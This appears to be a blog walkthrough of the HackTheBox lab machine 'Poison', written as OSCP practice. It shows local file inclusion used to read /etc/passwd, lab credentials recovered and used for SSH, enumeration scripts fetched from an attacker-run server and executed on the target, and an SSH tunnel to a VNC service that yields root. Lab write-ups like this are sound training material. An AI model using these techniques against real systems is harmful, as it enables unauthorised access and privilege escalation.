Road to OSCP 1: Poison HackTheBox

7 min readNov 22, 2020


Follow along in my OSCP journey, this is my target 1 of the TJNULL’s OSCP list.

How to use this walkthrough?

To avoid the typical answer on a plate type of walkthrough, I have decided to t follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.

Let’s go!


I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.

python3 /opt/AutoRecon/ -cs 25 -vv -o /home/kali/Documents/HTB/lab/

While it runs, let’s look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt

22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFLpOCLU3rRUdNNbb5u5WlP+JKUpoYw4znHe0n4mRlv5sQ5kkkZSDNMqXtfWUFzevPaLaJboNBOAXjPwd1OV1wL2YFcGsTL5MOXgTeW4ixpxNBsnBj67mPSmQSaWcudPUmhqnT5VhKYLbPk43FsWqGkNhDtbuBVo9/BmN+GjN1v7w54PPtn8wDd7Zap3yStvwRxeq8E0nBE4odsfBhPPC01302RZzkiXymV73WqmI8MeF9W94giTBQS5swH6NgUe4/QV1tOjTct/uzidFx+8bbcwcQ1eUgK5DyRLaEhou7PRlZX6Pg5YgcuQUlYbGjgk6ycMJDuwb2D5mJkAzN4dih
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKXh613KF4mJTcOxbIy/3mN/O/wAYht2Vt4m9PUoQBBSao16RI9B3VYod1HSbx3PYsPpKmqjcT7A/fHggPIzDYU=
| 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJrg2EBbG5D2maVLhDME5mZwrvlhTXrK7jiEI+MiZ+Am
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Let’s look at the web server

web application

We can see what looks like a file viewer app used for testing that allow us to check for files.

Getting User

We go through the list of files shown and the listfiles.php has some interesting content.


That pwdbackup.txt can’t be missed, let’s check its content.


The hint is quite clear and the “=” at the end of the encoded password seems to point at base64. After decoding it 13 times with base64 we get Charix!2#4%6&8(0


Now that we have a password we are looking for a user, did we encounter a user already?
Could we find a web vulnerability that would provide us the list of users?





Local File Inclusion

If we look at the URL structure browse.php?file=pwdbackup.txt, this highly suggest possibly a LFI or even RFI. Since we already have a password, getting the /etc/passwd file should be enough for us to connect to the machine. $FreeBSD: releng/11.1/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $ # 
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin m
ailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
unbound:*:59:59:Unbound DNS Resolver:/var/unbound:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:78:77:Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
_ypldap:*:160:160:YP LDAP unprivileged user:/var/empty:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
_tss:*:601:601:TrouSerS user:/var/empty:/usr/sbin/nologin
messagebus:*:556:556:D-BUS Daemon User:/nonexistent:/usr/sbin/nologin
avahi:*:558:558:Avahi Daemon User:/nonexistent:/usr/sbin/nologin
cups:*:193:193:Cups Owner:/nonexistent:/usr/sbin/nologin

There we go, we had the user all along in the password, let’s SSH in.

Credentials: charix:Charix!2#4%6&8(0

The user.txt flag is in the directory we have SSH in.

Getting Root

The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.

Quick Wins

sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
ls -la /root → misconfigured permissions

Because this is FREEBSD, most of these didn’t work or the path didn’t exist, decided to go for the enum scripts straight away.

Actually before we do this, when we got our user.txt flag, we saw a file in the home dir. We tried to unzip it the victim’s machine but it seems to ask a passphrase, let’s see if we need to crack it. Let’s set a similar python http server on the victim’s machine

charix@Poison:~ % python -m SimpleHTTPServer
Serving HTTP on port 8000 ... - - [22/Nov/2020 15:37:57] "GET / HTTP/1.1" 200 -


A couple of ideas come to mind: fcrackzip, empty password or available passwords.





It seems that our winner is charix’s password — Charix!2#4%6&8(0 output

Not sure yet what we’ll do with this. SSH to the root user with this password failed.

Enumeration scripts

This is where we upload our linpeas, LinEnum and Exploit Suggester.

On our attacking machine
We start by setting our Simple Python HTTP Server

sudo python -m SimpleHTTPServer 80
SimpleHTTPServer in our linux upload folder

On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.

cd /tmp/
wget http://attacking_ip/
chmod +x

There is an interesting piece of information in linpeas’ output but it might need some additional work from you to see it clearly.


How do you make sure not to miss any information from listing your processes?





ps auxww → this makes sure that there is no limit to the size of window displayed which ensures we don’t miss anything.

root     529  0.0  0.9  23620  8868 v0- I    14:29    0:00.02 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901 -localhost -nolisten tcp :1
root 540 0.0 0.7 67220 7064 v0- I 14:29 0:00.02 xterm -geometry 80x24+10+10 -ls -title X Desktop

We can see Xvnc running which seem to be running a VNC server.

VNC is a virtual screen for the X server(X11) which is the Linux GUI.
Let’s connect to VNC:

kali@kali:/opt/linux$ vncviewer
vncviewer: ConnectToTcpAddr: connect: Connection refused
Unable to connect to VNC server


The service seems unreachable, how could we expose it?





It seems the service is unreachable. It probably isn’t exposed since we didn’t see it when scanning the machine. Let's expose it through SSH tunneling with the information gathered from the process -rfbport 5901

ssh -L 5901:localhost:5901 charix@

Running this will log you in into the victim’s server but also create the tunnel, simply open another Tab and continue.

We can now access the service, but it seems we need a password (charix didn’t work)

kali@kali:~/Documents/HTB/lab/$ vncviewer localhost:5901
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication failed

Let's try with the last piece of the puzzle → secret we obtained from

vncviewer -passwd secret localhost:5901

LET’s GO! Let’s take the usual selfie at the end of each box to confirm the kill.

root@Poison:~ # id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
root@Poison:~ # ls
.Xauthority .k5login .rnd .viminfo
.cshrc .login .ssh .vnc
.history .profile .vim root.txt
root@Poison:~ # cat root.txt
root@Poison:~ # ifconfig
le0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
ether 00:50:56:b9:25:3f
hwaddr 00:50:56:b9:25:3f
inet netmask 0xffffff00 broadcast
media: Ethernet autoselect
status: active
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> metric 0 mtu 16384
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2
inet netmask 0xff000000
groups: lo
root@Poison:~ #

What did I learn?

  1. FREEBSD made it harder to know where all the pieces of the information were compared to our usual Debian based machines but realised the enum scripts still did a good job.
  2. We learned about a new service VNC and how to interact with it. Some additional article to improve our knowledge about VNC
  3. We learned a small detail for the ps command to make sure we don’t miss anything → ps auxww
  4. We learned how to expose services through SSH tunneling.


I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.




Flying Squirrel that loves everything around hacking. Training for the OSCP exam come join me on my stream so we can struggle together